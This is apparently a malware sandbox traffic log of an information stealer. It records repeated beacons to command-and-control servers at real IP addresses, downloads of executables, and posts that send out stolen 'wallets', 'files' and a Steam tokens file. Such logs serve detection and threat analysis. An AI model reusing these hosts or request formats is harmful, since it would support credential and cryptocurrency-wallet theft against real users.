Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDGHJEHJJDAAAKEBGCFHost: 85.28.47.31Content-Length: 947Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 31 32 39 37 35 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB12975B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGDGDHJJDGHCAAAKEHIJHost: 85.28.47.31Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 44 47 44 48 4a 4a 44 47 48 43 41 41 41 4b 45 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 63 33 33 38 33 35 33 34 37 38 32 30 31 65 30 31 39 32 66 66 32 61 62 65 63 62 65 66 37 39 39 32 61 33 64 30 33 30 34 65 62 35 35 30 66 39 32 33 36 36 65 65 64 33 33 65 65 63 34 31 30 65 66 66 65 34 34 31 34 32 63 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 44 48 4a 4a 44 47 48 43 41 41 41 4b 45 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 44 48 4a 4a 44 47 48 43 41 41 41 4b 45 48 49 4a 2d 2d 0d 0a Data Ascii: ------EGDGDHJJDGHCAAAKEHIJContent-Disposition: form-data; name="token"ec338353478201e0192ff2abecbef7992a3d0304eb550f92366eed33eec410effe44142c------EGDGDHJJDGHCAAAKEHIJContent-Disposition: form-data; name="message"wallets------EGDGDHJJDGHCAAAKEHIJ--
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHJEBGIEBFIJKEBFBFHHost: 85.28.47.31Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 48 4a 45 42 47 49 45 42 46 49 4a 4b 45 42 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 63 33 33 38 33 35 33 34 37 38 32 30 31 65 30 31 39 32 66 66 32 61 62 65 63 62 65 66 37 39 39 32 61 33 64 30 33 30 34 65 62 35 35 30 66 39 32 33 36 36 65 65 64 33 33 65 65 63 34 31 30 65 66 66 65 34 34 31 34 32 63 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 4a 45 42 47 49 45 42 46 49 4a 4b 45 42 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 4a 45 42 47 49 45 42 46 49 4a 4b 45 42 46 42 46 48 2d 2d 0d 0a Data Ascii: ------IDHJEBGIEBFIJKEBFBFHContent-Disposition: form-data; name="token"ec338353478201e0192ff2abecbef7992a3d0304eb550f92366eed33eec410effe44142c------IDHJEBGIEBFIJKEBFBFHContent-Disposition: form-data; name="message"ybncbhylepme------IDHJEBGIEBFIJKEBFBFH--
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /soka/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 31 32 39 37 35 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB12975B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 31 32 39 37 35 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB12975B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 31 32 39 37 35 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB12975B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: GET /mine/enter.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 31 32 39 37 35 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB12975B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 31 32 39 37 35 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB12975B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIECFBAAAFHIIDGCGCBFHost: 85.28.47.31Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 45 43 46 42 41 41 41 46 48 49 49 44 47 43 47 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 63 33 33 38 33 35 33 34 37 38 32 30 31 65 30 31 39 32 66 66 32 61 62 65 63 62 65 66 37 39 39 32 61 33 64 30 33 30 34 65 62 35 35 30 66 39 32 33 36 36 65 65 64 33 33 65 65 63 34 31 30 65 66 66 65 34 34 31 34 32 63 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 43 46 42 41 41 41 46 48 49 49 44 47 43 47 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 43 46 42 41 41 41 46 48 49 49 44 47 43 47 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 43 46 42 41 41 41 46 48 49 49 44 47 43 47 43 42 46 2d 2d 0d 0a Data Ascii: ------FIECFBAAAFHIIDGCGCBFContent-Disposition: form-data; name="token"ec338353478201e0192ff2abecbef7992a3d0304eb550f92366eed33eec410effe44142c------FIECFBAAAFHIIDGCGCBFContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------FIECFBAAAFHIIDGCGCBFContent-Disposition: form-data; name="file"------FIECFBAAAFHIIDGCGCBF--
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 31 32 39 37 35 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB12975B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGDHCGCBKFHJKEBKFBFHost: 85.28.47.31Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 47 44 48 43 47 43 42 4b 46 48 4a 4b 45 42 4b 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 63 33 33 38 33 35 33 34 37 38 32 30 31 65 30 31 39 32 66 66 32 61 62 65 63 62 65 66 37 39 39 32 61 33 64 30 33 30 34 65 62 35 35 30 66 39 32 33 36 36 65 65 64 33 33 65 65 63 34 31 30 65 66 66 65 34 34 31 34 32 63 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 44 48 43 47 43 42 4b 46 48 4a 4b 45 42 4b 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 44 48 43 47 43 42 4b 46 48 4a 4b 45 42 4b 46 42 46 2d 2d 0d 0a Data Ascii: ------HDGDHCGCBKFHJKEBKFBFContent-Disposition: form-data; name="token"ec338353478201e0192ff2abecbef7992a3d0304eb550f92366eed33eec410effe44142c------HDGDHCGCBKFHJKEBKFBFContent-Disposition: form-data; name="message"files------HDGDHCGCBKFHJKEBKFBF--
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGCBFCBFBKFHIECAFCFHost: 85.28.47.31Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 47 43 42 46 43 42 46 42 4b 46 48 49 45 43 41 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 63 33 33 38 33 35 33 34 37 38 32 30 31 65 30 31 39 32 66 66 32 61 62 65 63 62 65 66 37 39 39 32 61 33 64 30 33 30 34 65 62 35 35 30 66 39 32 33 36 36 65 65 64 33 33 65 65 63 34 31 30 65 66 66 65 34 34 31 34 32 63 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 43 42 46 43 42 46 42 4b 46 48 49 45 43 41 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 43 42 46 43 42 46 42 4b 46 48 49 45 43 41 46 43 46 2d 2d 0d 0a Data Ascii: ------KEGCBFCBFBKFHIECAFCFContent-Disposition: form-data; name="token"ec338353478201e0192ff2abecbef7992a3d0304eb550f92366eed33eec410effe44142c------KEGCBFCBFBKFHIECAFCFContent-Disposition: form-data; name="message"wkkjqaiaxkhb------KEGCBFCBFBKFHIECAFCF--
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 31 32 39 37 35 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB12975B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJEHJJKJEGHJJKEBFBGHost: 85.28.47.31Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 45 48 4a 4a 4b 4a 45 47 48 4a 4a 4b 45 42 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 44 41 31 44 41 37 38 35 35 44 37 32 32 38 34 35 38 32 31 32 37 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 45 48 4a 4a 4b 4a 45 47 48 4a 4a 4b 45 42 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 69 6c 61 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 45 48 4a 4a 4b 4a 45 47 48 4a 4a 4b 45 42 46 42 47 2d 2d 0d 0a Data Ascii: ------HJJEHJJKJEGHJJKEBFBGContent-Disposition: form-data; name="hwid"8DA1DA7855D72284582127------HJJEHJJKJEGHJJKEBFBGContent-Disposition: form-data; name="build"sila------HJJEHJJKJEGHJJKEBFBG--
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 31 32 39 37 35 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB12975B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 31 32 39 37 35 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB12975B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 31 32 39 37 35 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB12975B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 31 32 39 37 35 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB12975B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 31 32 39 37 35 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB12975B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 31 32 39 37 35 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB12975B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
